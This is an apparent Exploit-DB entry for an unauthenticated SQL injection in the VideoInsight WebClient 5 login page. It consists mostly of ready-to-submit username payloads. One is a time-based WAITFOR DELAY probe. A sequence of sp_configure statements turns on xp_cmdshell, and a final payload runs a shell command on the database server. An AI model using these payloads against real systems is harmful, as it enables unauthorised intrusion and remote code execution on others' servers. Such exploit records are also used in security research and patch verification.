VideoInsight WebClient 5 - SQL Injection

EDB-ID: 44917
Author: vosec
Published: 2018-06-20
Type: Webapps
Platform: Windows
Vulnerable App: N/A

 # Date: 2018-05-06 
# Author: vosec
# Vendor Homepage:
# Software Link:
# Version: 5
# Tested on: Windows Server 2008 R2
# CVE: N/A

# Description:
# This exploit is based on CVE-2017-5151 targeting versions prior.
# The txtUserName and possibly txtPassword field contain an unauthenticated SQL injection vulnerability
# that can be used for remote code execution.

# SQL Injection - PoC
# From the web login page submit the following string as the username with anything in the password field.
# The web server will hang for 5 seconds:

UyYr');WAITFOR DELAY '00:00:05'--

# Remote Code Execution - PoC
# From the web login page submit each of the following strings as the username, one at a time, with anything
# in the password field (with the ping, use a valid IP address that you can monitor):
UyYr');EXEC sp_configure 'show advanced options', 1;RECONFIGURE;--
UyYr');EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
UyYr');EXEC xp_cmdshell 'ping';--

Related Posts